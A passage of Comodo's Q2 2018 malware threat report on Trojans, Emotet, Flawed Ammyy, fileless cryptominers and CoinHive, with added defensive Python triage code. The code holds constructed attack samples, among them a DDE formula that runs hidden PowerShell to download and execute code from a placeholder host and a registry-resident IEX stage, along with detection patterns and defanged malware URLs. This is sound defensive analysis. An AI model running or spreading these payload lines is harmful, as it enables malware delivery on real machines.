The increase in Trojan malware in the last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many Trojan-based attacks that occurred in Q2 remain undetected, with their real impact to be revealed in quarters to come. Another important fact is that Trojans serve as a delivery vector for other types of malware. Combined, these facts point to a large surge in the infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The spread of fileless malware, the evolution of cryptominers and the abuse of legitimate tools like PowerShell are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful compromise, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of Trojans detected in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating drive to hunt for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and posture.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


1 Executive summary

1.1 Overview

• In Q2 Comodo Cybersecurity detected approximately 400 million unique malware samples all over the world.
• The malware was detected in 237 countries' top-level domains.
• Russia, Turkey and India were the countries with the highest number of worm infections.
• The United Kingdom had the highest proportion of detected backdoors.
• Ukraine and Russia were the most common countries of detection for viruses.
• Germany was the #1 country hit by Trojans.

1.2 New Trends

1.2.1 Trojans jumped to the top of the malware list

The most dangerous sign is the unfolding merger of Trojans and phishing emails, which amplifies the spread of malware. Attackers use Trojans to deliver other malware, and the Trojan surge accompanies a significant increase in other malware infections. Users therefore face a new challenge in the form of massive attacks that implant hidden malware with long-term activity.

1.2.2 Cryptominers evolved into multifunctional malware

Cryptomining decreased in quantity but grew in harmful capability. As events in Q2 demonstrated, this genre of malware is actively developing in two directions: better hiding and stronger persistence. Cryptominers have gained new features that let them fight antivirus software and root themselves deeply in users' systems.

1.2.3 Android malware skyrocketed in variety

In Q2 the Comodo Threat Research Labs observed a huge spike in Android malware development. Android devices have become attractive targets for cybercriminals because a modern mobile device is a treasure trove of data. Spyware leads the Android malware types. Like real-world spies, Android spyware constantly changes its guises and its methods of avoiding detection, and its harmful potential rises with every new version.

1.2.4 Geopolitical intelligence

Cyberattacks and malware spikes are often correlated with significant events in world politics. The appointments of the US Secretary of State and CIA Director, Armenia's political revolution, the Donald Trump and Vladimir Putin summit in Helsinki, the Champions League final in Ukraine, US-South Korean joint military exercises, the anniversary of the 1989 Tiananmen Square protests and other events during Q2 2018 clearly demonstrate such correlations.


2 Trojans going on the offensive to hunt for confidential data

The second quarter of 2018 brought a sudden change in the malware competition: Trojans squeezed out other malware types and jumped to the top of the charts. Having gained the lion's share of the malware marketplace, they can radically influence the cybersecurity landscape, and their rise obliges cybersecurity departments and individual users to update their defense tactics.

Malware Distribution by Type

Why are these changes inevitable?

Trojans are a special kind of malware. Their distinguishing feature is universality: they are the most effective means of mounting a diversity of attacks, stealing data, implanting ransomware, adware or cryptominers, or even completely crashing systems.

Another special feature of Trojans is covert activity. The owner of a Trojan-infected machine can remain unaware of the attack for a long time, during which the Trojan is an active malefactor.

Hence the need for a new approach to defense. Let's have a closer look at the most active and vicious players on the Trojan team, to understand what harm they can do to your computers if they sneak inside.


Distribution of top 30 Malware Families

In this list of the top 30 malware families, where Trojans overwhelmingly dominate, you can find samples of this malware exhibiting diverse types of malicious activity.

For example, the leader of the attacks in Q2, TrojWare.Win32.Agent, is a Trojan family that clandestinely penetrates users' computers and then downloads other malware from a cybercriminal server; the downloaded malware can be of any type.

Number two on the list, TrojWare.JS.Clickjack, exhibits different activity: it makes users unintentionally click on hidden links. The link can be just another advertisement or can lead to a malicious website that infects users with other types of malware.

TrojWare.JS.Faceliker clicks posts on Facebook on behalf of the user to promote fake or fraudulent pages. The malware infects users' browsers when they visit malicious or compromised websites; when infected users then open Facebook, Faceliker hijacks their "likes".

TrojWare.Win32.Kryptik steals information from computers and sends it to the cybercriminals' command-and-control server.


TrojWare.Win32.Injector uses process injection as its main technique for taking malicious actions; it is mostly used to bypass security products.

TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It is usually spread via phishing email.

Such diversity of malicious activity, together with their special ability to hide, has always made Trojans among the hardest malware to fight. But in Q2 2018 they became even more sophisticated and dangerous. Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.

First among the trends is an explosive mixture of Trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website to lure victims into supplying their credentials. But today phishing emails have become a potent means of delivery for Trojans and other malware. These Trojans steal credentials and private information by ferreting through infected machines in search of valuable data and then sending it to cybercriminals' servers.

The accompanying graph shows the most popular malware spread via email. Note that 18 of the 20 families are Trojans.

Distribution of Phishing Families of Malware


2.1 The Most Widespread Trojan

The most widespread of the email-delivered trojans, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.

If a user takes the bait and runs the file, it copies itself to %AppData% as D5E2DEE36C7A.exe, launches itself from that location and starts to gather the credentials present on the system.

It collects credentials and private data from known browsers, email clients, FTP clients, WebDAV and SCP clients, then sends all the collected data to the attackers' server (httpcallbedmlpackfarefrephp).

The phishing email


2.2 PowerShell-based attack with Emotet

Another alarming trend concerns the malware itself rather than its delivery method. Cybercriminals increasingly build their malware not on native Windows .exe files but on PowerShell scripts and other legitimate software already present on the machine. This type of attack is much harder for file-scanning antivirus tools to detect; command-line auditing and PowerShell script block logging are the controls that close most of that gap.

Emotet is one of the most aggressive trojans currently active. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.

The following attack started with an email imitating a message from the IRS about a "Tax Account Transcript". Notice that the message is written in a cheerful manner to inspire the user's trust.

The phishing email


The attached file is an Office document containing a VBA macro. Because a freshly installed Microsoft Office does not run such macros by default, the attackers added a special lure inside the document to convince victims to enable macro execution.

The special lure used to convince victims to enable macro execution


The purpose of the macro is to launch PowerShell.


The PowerShell stage downloads the payload into a temporary folder and executes it. The binaries were hosted at the following locations (defanged):

hxxp://www.iyilikleralemi.com/GtXvlc
hxxp://www.thecyberconxion.com/PUqUUe
hxxp://EliasWessel.com/vu6xGmS
hxxp://mossbeachmusic.de/XuBBN6r
hxxp://airmaxx.rs/wIdY

At the time of writing, only the thecyberconxion.com host was still serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).

The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service named "lanesviewer" to ensure persistence.

The malware creates ldquolanesviewerrdquo service to ensure persistence


After that Emotet begins its real mission: stealing private data from the compromised system and sending it to the cybercriminals' Command & Control server.

The next example is even more cunning, because it infects computers through popular, legitimate Microsoft software.

2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a long and varied history of use in cyberattacks. What is most remarkable is that it is based on a legitimate program, Ammyy Admin. Its history is a striking example of how malicious hackers turn a legitimate tool into a thief's tool.

Ammyy Admin is remote desktop software created by the Ammyy Group. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators adopted it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin installer with a bundle containing malware, so every user who downloaded Ammyy Admin was covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle repeated itself.


As the diagram shows, Ammyy Admin was used to spread many types of malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 and got its name from the leaked source code of Ammyy Admin version 3. Flawed Ammyy gives attackers functions such as remote desktop control, a file system manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, and so on.

The way Flawed Ammyy was spread in the second quarter deserves special attention, because it used a new trick to infect users. Notably, this trick is again based on legitimate software, this time from Microsoft.


Flawed Ammyy is delivered to victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are Excel Web Query files: an IQY contains a URL and a few related parameters, and when it is opened Excel fetches the content at that URL and loads it straight into a worksheet.

The malicious IQY pointed at an attacker-controlled URL, so opening it started a chain of malicious files that ended in downloading and running Flawed Ammyy via Windows PowerShell.
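The IQY format is simple enough that a mail gateway or sandbox can triage both the attachment and whatever its URL serves. The following is an added example, not code from the Comodo report: it parses the documented IQY layout (WEB / 1 / URL / key=value parameters), applies policy checks to the target URL, and flags formula cells in the fetched text that reference command execution. The sample attachment and sample query result are constructed for the demo, and the DDE-formula check is an assumption about how the fetched text ends up launching PowerShell; the report only states that the IQY starts a chain that runs Flawed Ammyy via PowerShell.

```python
"""Triage an Excel Web Query (.iqy) attachment and the text it fetches.

Added example; this is not code from the Comodo report. The IQY layout
parsed here (WEB / 1 / URL / key=value parameters) is the documented
format. SAMPLE_IQY and SAMPLE_QUERY_RESULT are constructed for the demo,
and the DDE-formula check is an assumption about how the fetched text
ends up launching PowerShell.
"""
import re
from urllib.parse import urlparse

# Constructed sample attachment, shaped like one from a phishing mail.
SAMPLE_IQY = (
    "WEB\r\n"
    "1\r\n"
    "http://updates.example.invalid/1.dat\r\n"
    "\r\n"
    "Selection=AllTables\r\n"
    "Formatting=None\r\n"
)

# Constructed sample of what such a URL might serve: a single cell holding a
# formula that Excel hands to DDE if the user accepts the prompts.
SAMPLE_QUERY_RESULT = (
    "=cmd|' /c powershell -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://updates.example.invalid/2.txt')\"'!A0\r\n"
)

# Substrings that never belong in a legitimate web query result.
EXEC_MARKERS = ("cmd|", "powershell", "mshta", "rundll32", "regsvr32",
                "certutil", "wscript", "cscript", "msiexec", "bitsadmin")


def parse_iqy(text):
    """Return {'version', 'url', 'params'} for an IQY file, or raise ValueError."""
    lines = [line.strip() for line in text.splitlines()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel web query")
    params = {}
    for line in lines[3:]:
        if "=" in line:
            key, value = line.split("=", 1)
            params[key.strip()] = value.strip()
    return {"version": lines[1], "url": lines[2], "params": params}


def iqy_findings(query, trusted_hosts=()):
    """Policy checks on the query target; each finding is a short tag."""
    findings = []
    url = urlparse(query["url"])
    host = (url.hostname or "").lower()
    if url.scheme.lower() != "https":
        findings.append("non-https-url")
    if host not in {h.lower() for h in trusted_hosts}:
        findings.append("untrusted-host")
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
        findings.append("ip-literal-host")
    return findings


def query_result_findings(text):
    """Flag formula cells in fetched text that reference command execution."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        cell = line.strip()
        if not cell.startswith("="):
            continue  # plain data, not a formula
        lowered = cell.lower()
        hits = [marker for marker in EXEC_MARKERS if marker in lowered]
        if hits:
            findings.append((number, hits))
    return findings


def verdict(iqy_text, fetched_text, trusted_hosts=()):
    """'block' if either the query target or the fetched content is suspect."""
    query = parse_iqy(iqy_text)
    if iqy_findings(query, trusted_hosts) or query_result_findings(fetched_text):
        return "block"
    return "allow"


if __name__ == "__main__":
    q = parse_iqy(SAMPLE_IQY)
    print(q["url"], iqy_findings(q, trusted_hosts=("intranet.example.invalid",)))
    print(query_result_findings(SAMPLE_QUERY_RESULT))
    print(verdict(SAMPLE_IQY, SAMPLE_QUERY_RESULT))
```

The fetched-content check matters more than the URL check: the IQY itself contains no code, so a gateway that only scans the attachment will pass it, and the fetch has to be replayed (or the attachment blocked outright) to see the formula that actually launches PowerShell.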

Malware runs PowerShell


Thus, in this case machines face extremely dangerous and potent malware created from and delivered through legitimate software, which makes the attack much harder for antivirus software to detect.

2.4 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became the 800-pound gorilla of the malware market in Q2. This trend will inevitably shift attack vectors toward covert theft and manipulation of users: a gift for cybercriminals and a nightmare for users.

Trojans buy attackers time. Because the malware acts covertly, cybercriminals have more than enough time to exploit the stolen data; in many cases the attack is discovered only when it is too late, after money has been withdrawn from a bank account or confidential data has been published. The combination of trojans as payloads and phishing emails as the delivery channel observed in Q2 will drive a surge in such attacks and victims, and the use of legitimate tools like PowerShell to run malware will amplify it further, because such attacks are much harder for antivirus products to detect.

To fight these attacks, security departments need to realign their controls with the trends above. Combining the best malware-detection tools with data-protection measures built on defense-in-depth principles offers the most promising solution.

Chart values by month (section 2.4, The growth of Flawed Ammyy attacks for Q2; axis 40,000 to 50,000): Apr 43,188; May 46,382; Jun 48,881


3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact has greatly diminished. On the contrary, current cryptominer behavior recalls an army preparing for battle: training and re-equipping to fight more efficiently. Cryptominers are developing quickly and gaining dangerous new abilities.

Earlier cryptominers could only use the infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: at least cryptominers did not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has changed radically.

New cryptominer samples detected by Comodo malware analysts exhibit far more harmful abilities than are needed merely to mine cryptocurrency. These samples show that cryptominers are turning into a sophisticated, multifunctional weapon for cybercriminals. They are learning to hide and to fight back against anti-malware tools: they can camouflage themselves, kill competing cryptominers, and even crash the user's system if an attempt is made to delete them.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware compared with traditional infection via .exe files. File-based malware resides on the hard drive, which makes it easier to detect. Fileless malware is different: as its name suggests, it is malicious code injected into legitimate OS processes. It need not be installed on the victim machine as a file and runs only in memory, which makes it much harder for antivirus products to detect. In practice the code still has to survive a reboot somewhere, typically in a registry value or a scheduled task, and that is exactly where the BadShell case described in this section was found.

Such malware is usually spread via malicious ad banners. Clicking on a banner redirects the user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of the infection. Not surprisingly, its use by cybercriminals is increasing.

Last quarter Comodo Threat Research Labs analysts handled exactly such an attack. A company with several thousand endpoints was compromised by fileless malware. When its legacy security software failed to protect it, the company turned to Comodo Threat Research Labs for assistance.


Comodo analysts found that the malware was a cryptominer that relied on legitimate Windows components: PowerShell to execute commands, Task Scheduler for persistence, and the Registry to hold the malicious binary code. The screenshots below show exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code stored in the registry. The PowerShell script reads it from there and injects it into an existing running process.
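Both the Emotet chain in section 2.2 (Office document, script host, PowerShell, download) and the BadShell case here (PowerShell pulling its stage out of a registry value) leave the same footprint in process-creation telemetry: an unusual parent/child pair and a PowerShell command line whose real content is hidden behind -EncodedCommand. The following is an added example, not code from the Comodo report, showing how to decode that argument and tag such records. The records in SAMPLE_EVENTS are constructed in a Sysmon-like shape, and the registry path and base64 stage inside them are made up for the demo; the -EncodedCommand encoding itself (base64 over UTF-16LE) is how PowerShell really does it.

```python
"""Triage process-creation records for Office -> script host -> PowerShell
chains and decode PowerShell -EncodedCommand payloads to see what they do.

Added example; this is not code from the Comodo report. SAMPLE_EVENTS are
constructed, Sysmon-like records; the registry path and base64 stage in
them are invented for the demo. The -EncodedCommand encoding (base64 over
UTF-16LE) is PowerShell's real behaviour.
"""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe", "powershell.exe"}

# Patterns run over a visible command line or a decoded script: tag, regex.
SCRIPT_INDICATORS = [
    ("registry-resident-payload", r"(?i)Get-ItemProperty\s+['\"]?HK(?:CU|LM|EY_[A-Z_]+)"),
    ("invoke-expression", r"(?i)\b(?:IEX|Invoke-Expression)\b"),
    ("base64-stage", r"(?i)FromBase64String"),
    ("remote-download", r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient"),
    ("service-persistence", r"(?i)New-Service|\bsc(?:\.exe)?\s+create\b"),
    ("hidden-window", r"(?i)-w(?:indowstyle)?\s+hidden"),
]

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_ARG = re.compile(r"(?i)(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def encode_command(script):
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def script_indicators(text):
    return [tag for tag, pattern in SCRIPT_INDICATORS if re.search(pattern, text)]


def triage(event):
    """Return the list of finding tags for one process-creation record."""
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    findings = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append("office-spawned-script-host")
    if parent in SCRIPT_HOSTS and image == "powershell.exe":
        findings.append("script-host-spawned-powershell")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        findings.append("encoded-command")
    # Scan the visible command line (minus the base64 blob) and the decoded script.
    visible = ENCODED_ARG.sub("", event["cmdline"])
    for text in (visible, decoded or ""):
        for tag in script_indicators(text):
            if tag not in findings:
                findings.append(tag)
    return findings


# Constructed stage of the BadShell kind: code kept in a registry value,
# read back, base64-decoded and run in memory through Invoke-Expression.
STAGE = ("$c=(Get-ItemProperty 'HKCU:\\Software\\Classes\\demo').code;"
         "IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($c)))")

SAMPLE_EVENTS = [  # constructed, Sysmon-like
    {"parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": "wscript.exe \"C:\\Users\\u\\AppData\\Local\\Temp\\transcript.vbs\""},
    {"parent": "C:\\Windows\\System32\\wscript.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_command(STAGE)},
    {"parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]


def triage_all(events):
    """Map each record's index to its findings, omitting clean records."""
    return {i: tags for i, tags in ((i, triage(e)) for i, e in enumerate(events)) if tags}


if __name__ == "__main__":
    for i, tags in triage_all(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["image"].rsplit("\\", 1)[-1], tags)
```

The decoded script is where the value is: a hidden-window PowerShell launched by wscript.exe is suspicious on its own, but Get-ItemProperty against a registry key followed by FromBase64String and IEX is the registry-resident, in-memory pattern the report describes, and the "service-persistence" tag covers the lanesviewer-style service creation from section 2.2.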

BadShell at work


The malicious code in the registry


This incident shows how damaging cryptominer activity can be. Imagine it: the entire compute capacity of the enterprise's computers was tied up mining cryptocurrency, leaving employees unable to do their jobs. Comodo analysts took over the situation and cleaned the infection from all affected computers, but the company's financial losses were, of course, irreversible.

Evading antivirus and persisting on the system are the most important attributes of a cryptominer, because the longer it runs on the infected system, the more it profits the attackers. That is why cybercriminals pay special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into the attacker's slave.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is built to steal computer resources and mine cryptocurrency for cybercriminals. But it has a special feature: it roots itself into the system so deeply that it becomes unremovable, and an attempt to kill it takes the whole system down.

The secret of WinstarNssmMiner's persistence lies in the way it infects the victim's computer. It consists of two components injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially notable is that both infected svchost.exe processes are marked as critical processes (the BreakOnTermination flag), so terminating either of them crashes the system and leaves the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only the victim's system but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows

The code below downloads the CoinMiner build for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, holding the names of the processes it is instructed to kill. The lists include other types of cryptominers.

In this way CoinMiner keeps the victim's computer to itself and uses all of its resources for mining cryptocurrency.


Some cryptominers have drawn the spotlight of the mass media and security researchers, which made them easier for users to spot. In Q2 these cryptominers learned to hide, and CoinHive is the clearest example.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its snippet of code into a web page, every visitor to the site mines coins for you.

As you can see, the plain CoinHive script is easy to detect.

The CoinHive script

After many publications on the subject in the mass media and in security reports, users started checking website code for cryptominers. In the second quarter perpetrators found a way around this obstacle: they now use a sneaky trick to camouflage the presence of CoinHive with URL shorteners.


As a result, the malicious code on the web page looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1 to make it as close to invisible as possible.

Now let's look at the URL https://cnhv.co

And there we can find the familiar link to CoinHive

The link to CoinHive


What is the impact of this trick? In a simple scenario a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the page source but finds no sign of a cryptominer. So she concludes that something is wrong with her PC, while CoinHive keeps using her computer to mine cryptocoins.
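A page check that only greps for the coinhive.com script tag is exactly what this trick defeats, so a useful scanner has to peel off the string-obfuscation layers (percent-encoded unescape() strings, atob() base64, \xNN escapes) before looking for the loader, and should treat a 1x1 iframe pointing at a shortener as a finding in its own right. The following is an added example, not code from the Comodo report; the page snippets are constructed for the demo, cnhv.co and coinhive.com are the hosts named in the report, and authedmine.com (CoinHive's opt-in domain) is included as an assumption.

```python
"""Scan page source for CoinHive loaders, including the URL-shortener iframe
trick, by unwrapping common JavaScript string-obfuscation layers first.

Added example; this is not code from the Comodo report. The page snippets
are constructed for the demo; cnhv.co and coinhive.com come from the report
and authedmine.com is added as an assumption.
"""
import base64
import re
from urllib.parse import quote, unquote, urlparse

MINER_HOSTS = {"coinhive.com", "cnhv.co", "authedmine.com"}

UNESCAPE_CALL = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)")
ATOB_CALL = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
HEX_ESCAPE = re.compile(r"(?:\\x[0-9A-Fa-f]{2}){4,}")
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I)
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
ATTR = re.compile(r"(\w+)\s*=\s*['\"]?([^'\"\s>]+)")


def decode_layers(text):
    """Return the text plus every string decoded out of it, layer by layer,
    so base64 wrapped around a percent-encoded string is still unwrapped."""
    seen, queue = [], [text]
    while queue:
        current = queue.pop()
        if current in seen:
            continue
        seen.append(current)
        for m in UNESCAPE_CALL.finditer(current):
            queue.append(unquote(m.group(1)))
        for m in ATOB_CALL.finditer(current):
            try:
                queue.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
            except ValueError:
                pass
        for m in HEX_ESCAPE.finditer(current):
            queue.append(bytes.fromhex(m.group(0).replace("\\x", "")).decode("latin-1"))
    return seen


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def scan_page(html):
    """Return sorted (tag, host) findings; an empty list means nothing CoinHive-like."""
    findings = set()
    for layer in decode_layers(html):
        for m in SCRIPT_SRC.finditer(layer):
            host = host_of(m.group(1))
            if host in MINER_HOSTS:
                findings.add(("miner-script", host))
        for m in IFRAME_TAG.finditer(layer):
            attrs = {k.lower(): v for k, v in ATTR.findall(m.group(1))}
            host = host_of(attrs.get("src", ""))
            tiny = attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1")
            if host in MINER_HOSTS:
                findings.add(("miner-iframe", host))
            elif tiny and host:
                findings.add(("pixel-iframe", host))  # hidden frame to an unknown host
    return sorted(findings)


# Constructed samples. The obfuscated pages are built at runtime from the plain
# iframe so the percent-encoding and base64 are guaranteed to be correct.
HIDDEN_IFRAME = '<iframe src="https://cnhv.co/abc123" width="1" height="1" frameborder="0"></iframe>'
PLAIN_PAGE = ('<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
              '<script>new CoinHive.Anonymous("SITEKEY").start();</script>')
UNESCAPE_PAGE = "<script>document.write(unescape('%s'));</script>" % quote(HIDDEN_IFRAME, safe="")
ATOB_PAGE = "<script>eval(atob('%s'));</script>" % base64.b64encode(
    ("document.write(unescape('%s'));" % quote(HIDDEN_IFRAME, safe="")).encode()).decode()
CLEAN_PAGE = '<p>hello</p><iframe src="https://www.example.com/embed" width="640" height="360"></iframe>'

if __name__ == "__main__":
    for name, page in [("plain", PLAIN_PAGE), ("unescape", UNESCAPE_PAGE),
                       ("atob", ATOB_PAGE), ("clean", CLEAN_PAGE)]:
        print(name, scan_page(page))
```

The shortener link is only resolved by the browser, so a static scanner cannot see coinhive.com behind cnhv.co; that is why the known-shortener host and the 1x1 iframe heuristic are both needed, and why an allow-list of shortener domains is a cheap control on sites that have no business embedding one.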

The next malware in the row does not mine cryptocurrency at all; it steals it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief than a cryptominer, because it does not devour the infected machine's resources but actually steals cryptocurrency by redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or type by hand. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a gap they can exploit.

The cryptocurrency clipboard hijacker watches the clipboard for a copied wallet address. When it finds one, it replaces it with the address of a wallet under the attacker's control, so the unsuspecting owner of the infected machine delivers cryptocoins straight into the cybercriminals' hands.

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed bundled with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The trojanized version of All-Radio 4.27 was used to spread several types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
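The swap is invisible to the user only because nobody compares what was copied with what is about to be pasted. The following is an added example, not code from the Comodo report: hijack() mirrors the behaviour the report describes (replace any copied address with the attacker's), and guard_paste() is the user-side check, which remembers what was copied, compares it with the current clipboard content, and validates the Base58Check checksum of legacy Bitcoin addresses. The two addresses from the example above drive the demo; the address-format regexes and the Base58Check arithmetic are the standard definitions, not something taken from the malware.

```python
"""Catch a clipboard wallet-address swap before the transfer is sent.

Added example; this is not code from the Comodo report. hijack() mirrors
the reported malware behaviour; guard_paste() is the user-side check. The
two addresses from the report are used only to drive the demo.
"""
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Address shapes the guard recognises: kind first, pattern second.
ADDRESS_SHAPES = [
    ("btc-legacy", re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$")),
    ("btc-bech32", re.compile(r"^bc1[02-9ac-hj-np-z]{6,87}$")),
    ("eth", re.compile(r"^0x[0-9a-fA-F]{40}$")),
]


def address_kind(text):
    """Return the kind of wallet address `text` looks like, or None."""
    for kind, pattern in ADDRESS_SHAPES:
        if pattern.match(text.strip()):
            return kind
    return None


def b58decode(s):
    """Decode a base58 string to bytes; each leading '1' is one zero byte."""
    n = 0
    for ch in s:
        digit = B58_ALPHABET.find(ch)
        if digit < 0:
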